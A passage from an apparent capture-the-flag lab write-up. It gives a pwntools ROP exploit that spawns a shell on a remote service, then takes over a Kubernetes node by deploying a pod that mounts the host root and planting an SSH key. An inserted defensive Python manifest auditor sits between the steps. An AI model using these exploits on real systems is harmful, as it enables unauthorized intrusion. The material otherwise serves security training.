    p.sendlineafter(b"Key: ",key)

def edit(key,data):
    p.sendlineafter(b'Option:',b'3')
    p.sendlineafter(b'Key:',key)
    p.sendlineafter(b'Data:',data)

def name(username):
    p.sendlineafter(b'Option:',b'4')
    p.sendlineafter(b'name:',username)

p = remote('172.28.23.33', 59696)
# p = process('./HashNote')

username=0x5dc980
stack=0x5e4fa8
ukey=b'\x30'*5+b'\x31'+b'\x44'
fake_chunk=flat({
    0:username+0x10,
    0x10:[username+0x20,len(ukey),ukey,0],
    0x30:[stack,0x10]
},filler=b'\x00')
p.sendlineafter(b'name',fake_chunk)
p.sendlineafter(b'word','freep@ssw0rd:3')
add(b'\x30'*1+b'\x31'+b'\x44',b'test') # 126
add(b'\x30'*2+b'\x31'+b'\x44',b'test') # 127
show(ukey)
main_ret=u64(p.read(8))-0x1e0

rdi=0x0000000000405e7c # pop rdi ; ret
rsi=0x000000000040974f # pop rsi ; ret
rdx=0x000000000053514b # pop rdx ; pop rbx ; ret
rax=0x00000000004206ba # pop rax ; ret
syscall=0x00000000004560c6 # syscall

fake_chunk=flat({
    0:username+0x20,
    0x20:[username+0x30,len(ukey),ukey,0],
    0x40:[main_ret,0x100,b'/bin/sh\x00']
},filler=b'\x00')
name(fake_chunk.ljust(0x80,b'\x00'))
payload=flat([
    rdi,username+0x50,
    rsi,0,
    rdx,0,0,
    rax,0x3b,
    syscall
])
p.sendlineafter(b'Option:',b'3')
p.sendlineafter(b'Key:',ukey)
p.sendline(payload)
p.sendlineafter(b'Option:',b'9')
p.interactive()
That gives flag03:
$ cat f1ag03.txt
flag03: flag{6a326f94-6526-4586-8233-152d137281fd}
K8s (flag04)
Next, look at 172.22.14.37, whose Kubernetes API server accepts unauthenticated requests:
┌──(root㉿kali-plus)-[~]
└─# proxychains4 curl https://172.22.14.37:6443/ -k
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain ... 156.238.233.21:15001 ... 172.22.14.37:6443 ... OK
{
"paths": [
"/api",
"/api/v1",
"/apis",
"/apis/",
"/apis/admissionregistration.k8s.io",
"/apis/admissionregistration.k8s.io/v1",
"/apis/admissionregistration.k8s.io/v1beta1",
"/apis/apiextensions.k8s.io",
"/apis/apiextensions.k8s.io/v1",
"/apis/apiextensions.k8s.io/v1beta1",
"/apis/apiregistration.k8s.io",
"/apis/apiregistration.k8s.io/v1",
"/apis/apiregistration.k8s.io/v1beta1",
"/apis/apps",
"/apis/apps/v1",
"/apis/authentication.k8s.io",
"/apis/authentication.k8s.io/v1",
"/apis/authentication.k8s.io/v1beta1",
"/apis/authorization.k8s.io",
"/apis/authorization.k8s.io/v1",
"/apis/authorization.k8s.io/v1beta1",
"/apis/autoscaling",
"/apis/autoscaling/v1",
"/apis/autoscaling/v2beta1",
"/apis/autoscaling/v2beta2",
"/apis/batch",
"/apis/batch/v1",
"/apis/batch/v1beta1",
"/apis/certificates.k8s.io",
"/apis/certificates.k8s.io/v1beta1",
"/apis/coordination.k8s.io",
"/apis/coordination.k8s.io/v1",
"/apis/coordination.k8s.io/v1beta1",
"/apis/events.k8s.io",
"/apis/events.k8s.io/v1beta1",
"/apis/extensions",
"/apis/extensions/v1beta1",
"/apis/networking.k8s.io",
"/apis/networking.k8s.io/v1",
"/apis/networking.k8s.io/v1beta1",
"/apis/node.k8s.io",
"/apis/node.k8s.io/v1beta1",
"/apis/policy",
"/apis/policy/v1beta1",
"/apis/rbac.authorization.k8s.io",
"/apis/rbac.authorization.k8s.io/v1",
"/apis/rbac.authorization.k8s.io/v1beta1",
"/apis/scheduling.k8s.io",
"/apis/scheduling.k8s.io/v1",
"/apis/scheduling.k8s.io/v1beta1",
"/apis/storage.k8s.io",
"/apis/storage.k8s.io/v1",
"/apis/storage.k8s.io/v1beta1",
"/healthz",
"/healthz/autoregister-completion",
"/healthz/etcd",
"/healthz/log",
"/healthz/ping",
"/healthz/poststarthook/apiservice-openapi-controller",
"/healthz/poststarthook/apiservice-registration-controller",
"/healthz/poststarthook/apiservice-status-available-controller",
"/healthz/poststarthook/bootstrap-controller",
"/healthz/poststarthook/ca-registration",
"/healthz/poststarthook/crd-informer-synced",
"/healthz/poststarthook/generic-apiserver-start-informers",
"/healthz/poststarthook/kube-apiserver-autoregistration",
"/healthz/poststarthook/rbac/bootstrap-roles",
"/healthz/poststarthook/scheduling/bootstrap-system-priority-classes",
"/healthz/poststarthook/start-apiextensions-controllers",
"/healthz/poststarthook/start-apiextensions-informers",
"/healthz/poststarthook/start-kube-aggregator-informers",
"/healthz/poststarthook/start-kube-apiserver-admission-initializer",
"/livez",
"/livez/autoregister-completion",
"/livez/etcd",
"/livez/log",
"/livez/ping",
"/livez/poststarthook/apiservice-openapi-controller",
"/livez/poststarthook/apiservice-registration-controller",
"/livez/poststarthook/apiservice-status-available-controller",
"/livez/poststarthook/bootstrap-controller",
"/livez/poststarthook/ca-registration",
"/livez/poststarthook/crd-informer-synced",
"/livez/poststarthook/generic-apiserver-start-informers",
"/livez/poststarthook/kube-apiserver-autoregistration",
"/livez/poststarthook/rbac/bootstrap-roles",
"/livez/poststarthook/scheduling/bootstrap-system-priority-classes",
"/livez/poststarthook/start-apiextensions-controllers",
"/livez/poststarthook/start-apiextensions-informers",
"/livez/poststarthook/start-kube-aggregator-informers",
"/livez/poststarthook/start-kube-apiserver-admission-initializer",
"/logs",
"/metrics",
"/openapi/v2",
"/readyz",
"/readyz/autoregister-completion",
"/readyz/etcd",
"/readyz/log",
"/readyz/ping",
"/readyz/poststarthook/apiservice-openapi-controller",
"/readyz/poststarthook/apiservice-registration-controller",
"/readyz/poststarthook/apiservice-status-available-controller",
"/readyz/poststarthook/bootstrap-controller",
"/readyz/poststarthook/ca-registration",
"/readyz/poststarthook/crd-informer-synced",
"/readyz/poststarthook/generic-apiserver-start-informers",
"/readyz/poststarthook/kube-apiserver-autoregistration",
"/readyz/poststarthook/rbac/bootstrap-roles",
"/readyz/poststarthook/scheduling/bootstrap-system-priority-classes",
"/readyz/poststarthook/start-apiextensions-controllers",
"/readyz/poststarthook/start-apiextensions-informers",
"/readyz/poststarthook/start-kube-aggregator-informers",
"/readyz/poststarthook/start-kube-apiserver-admission-initializer",
"/readyz/shutdown",
"/version"
]
}
Edit evil-deployment.yaml to create a privileged container that mounts the host's / directory at /mnt inside the container.
┌──(kali㉿kali)-[~/GreatWall]
└─$ vim evil-deployment.yaml
The manifest:
# evil-deployment.yaml
apiVersion: apps/v1
kind: Deployment
metadata:
  name: nginx-deployment
  labels:
    app: nginx
spec:
  replicas: 1
  selector:
    matchLabels:
      app: nginx
  template:
    metadata:
      labels:
        app: nginx
    spec:
      containers:
      - name: nginx
        image: nginx:1.8
        volumeMounts:
        - mountPath: /mnt
          name: test-volume
      volumes:
      - name: test-volume
        hostPath:
          path: /
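As an added example (not from the writeup), the following Python check flags the pod-spec features that make a manifest like evil-deployment.yaml a node takeover. Note that the manifest above never sets privileged: true; a read-write hostPath of / is enough to write the node's authorized_keys. The manifests are written as constructed dicts so the block runs without PyYAML; on real files use yaml.safe_load() first.

```python
# Added example: admission-style audit of a pod spec for host-escape primitives.
SENSITIVE_HOST_PATHS = ("/etc", "/root", "/var/run", "/var/lib/kubelet", "/proc", "/dev")

def _is_sensitive(path):
    """True for the host root or anything under a path that yields host control."""
    norm = path.rstrip("/") or "/"
    if norm == "/":
        return True
    return any(norm == p or norm.startswith(p + "/") for p in SENSITIVE_HOST_PATHS)

def _pod_spec(manifest):
    # Deployments, DaemonSets, StatefulSets and Jobs wrap a pod template; a bare Pod does not.
    spec = manifest.get("spec", {})
    return spec.get("template", {}).get("spec", spec)

def audit_manifest(manifest):
    """Return a list of human-readable findings; an empty list means nothing suspicious."""
    name = manifest.get("metadata", {}).get("name", "<unnamed>")
    spec = _pod_spec(manifest)
    findings = []
    for flag in ("hostPID", "hostNetwork", "hostIPC"):
        if spec.get(flag):
            findings.append(f"{name}: pod requests {flag}")
    host_vols = {}  # volume name -> host path, so mounts can be tied back to volumes
    for vol in spec.get("volumes", []):
        hp = vol.get("hostPath")
        if hp is not None:
            path = hp.get("path", "")
            host_vols[vol["name"]] = path
            if _is_sensitive(path):
                findings.append(f"{name}: hostPath volume '{vol['name']}' exposes host path {path}")
    for c in spec.get("containers", []) + spec.get("initContainers", []):
        sc = c.get("securityContext", {})
        if sc.get("privileged"):
            findings.append(f"{name}/{c['name']}: privileged container")
        for vm in c.get("volumeMounts", []):
            if vm["name"] in host_vols:
                mode = "read-only" if vm.get("readOnly") else "read-write"
                findings.append(f"{name}/{c['name']}: mounts host {host_vols[vm['name']]} "
                                f"at {vm['mountPath']} {mode}")
    return findings

# Constructed dict mirroring evil-deployment.yaml above: no privileged flag anywhere,
# the host root mounted read-write at /mnt is what makes it a node takeover.
EVIL_DEPLOYMENT = {
    "apiVersion": "apps/v1", "kind": "Deployment",
    "metadata": {"name": "nginx-deployment"},
    "spec": {"replicas": 1,
             "template": {"spec": {
                 "containers": [{"name": "nginx", "image": "nginx:1.8",
                                 "volumeMounts": [{"mountPath": "/mnt", "name": "test-volume"}]}],
                 "volumes": [{"name": "test-volume", "hostPath": {"path": "/"}}]}}},
}

# Constructed benign pod for comparison: scratch space only, nothing from the host.
SAFE_POD = {
    "apiVersion": "v1", "kind": "Pod", "metadata": {"name": "web"},
    "spec": {"containers": [{"name": "web", "image": "nginx:1.25",
                             "volumeMounts": [{"mountPath": "/cache", "name": "scratch"}]}],
             "volumes": [{"name": "scratch", "emptyDir": {}}]},
}

if __name__ == "__main__":
    for m in (EVIL_DEPLOYMENT, SAFE_POD):
        print(m["metadata"]["name"], audit_manifest(m) or ["clean"])
```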
Create the pod with kubectl apply, list it with get, and enter it with exec. Running kubectl through proxychains4 on Kali kept hanging, so I had to download a Windows exe instead:
E:\渗透\春秋云镜>kubectl.exe --insecure-skip-tls-verify -s https://172.22.14.37:6443/ apply -f evil-deployment.yaml
Please enter Username: 1
Please enter Password: deployment.apps/nginx-deployment unchanged
E:\渗透\春秋云镜>kubectl.exe --insecure-skip-tls-verify -s https://172.22.14.37:6443/ get pods
Please enter Username: 1
Please enter Password: NAME READY STATUS RESTARTS AGE
nginx-deployment-864f8bfd6f-wg9bn 1/1 Running 0 49s
E:\渗透\春秋云镜>kubectl.exe --insecure-skip-tls-verify -s https://172.22.14.37:6443/ exec -it nginx-deployment-864f8bfd6f-wg9bn /bin/bash
kubectl exec [POD] [COMMAND] is DEPRECATED and will be removed in a future version. Use kubectl exec [POD] -- [COMMAND] instead.
Please enter Username: test
Please enter Password: root@nginx-deployment-864f8bfd6f-wg9bn:/#
root@nginx-deployment-864f8bfd6f-wg9bn:/# echo "ssh-rsa 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 root@kali-plus" > /mnt/root/.ssh/authorized_keys
Then SSH in from Kali and connect to the database; flag04 is stored in the database:
┌──(root㉿kali-plus)-[~/.ssh]
└─# proxychains4 ssh -i id_rsa1 root@172.22.14.37
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain ... 156.238.233.21:15001 ... 172.22.14.37:22 ... OK
Welcome to Ubuntu 18.04.6 LTS (GNU/Linux 4.15.0-213-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
Welcome to Alibaba Cloud Elastic Compute Service !
Last login: Mon Mar 17 16:32:24 2025 from 106.37.219.130
root@ubuntu-k8s:~# ls
metarget nginx-deployment.yaml
root@ubuntu-k8s:~# mysql
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 2
Server version: 5.7.42-0ubuntu0.18.04.1 (Ubuntu)
Copyright (c) 2000, 2023, Oracle and/or its affiliates.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| flaghaha |
| mysql |
| performance_schema |
| sys |
+--------------------+
5 rows in set (0.00 sec)
mysql> use flaghaha
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed, 3 warnings
mysql> show tables;
+--------------------+
| Tables_in_flaghaha |
+--------------------+
| flag04 |
+--------------------+
1 row in set (0.00 sec)
mysql> select * from flag04;
+------+--------------------------------------------------------------+
| id | f1agggggishere |
+------+--------------------------------------------------------------+
| 1 | ZmxhZ3tkYTY5YzQ1OS03ZmU1LTQ1MzUtYjhkMS0xNWZmZjQ5NmEyOWZ9Cg== |
+------+--------------------------------------------------------------+
1 row in set (0.01 sec)
┌──(root㉿kali-plus)-[~]
└─# echo 'ZmxhZ3tkYTY5YzQ1OS03ZmU1LTQ1MzUtYjhkMS0xNWZmZjQ5NmEyOWZ9Cg=='|base64 -d
flag{da69c459-7fe5-4535-b8d1-15fff496a29f}
Done!

Summary
The early part of this range is straightforward: ThinkPHP 5.0.23 RCE has ready-made exploitation tools, so the first box's shell is easy to get. Then upload fscan and Stowaway, scan the subnet with fscan, and two paths appear: the Xinxiang OA file upload, and the heapdump leak followed by a pwn challenge. After getting a shell on the file-upload box there are again two paths: the unauthenticated K8s API, and Harbor followed by MySQL UDF privilege escalation. Where I got stuck was the disable_functions bypass after the Xinxiang OA upload: the AntSword plugin did not work well, it still had to be switched to GET by hand, and even then it was unreliable. In the end I found ta0's writeup and used his exploit for command execution, connected back with Stowaway directly, and opened a second-level proxy on top of the existing one. Harbor CVE-2022-46463 also required finding a PoC, but the on-site environment apparently had no internet access, meaning you need a local vulnerability library that already contains the PoC for it.
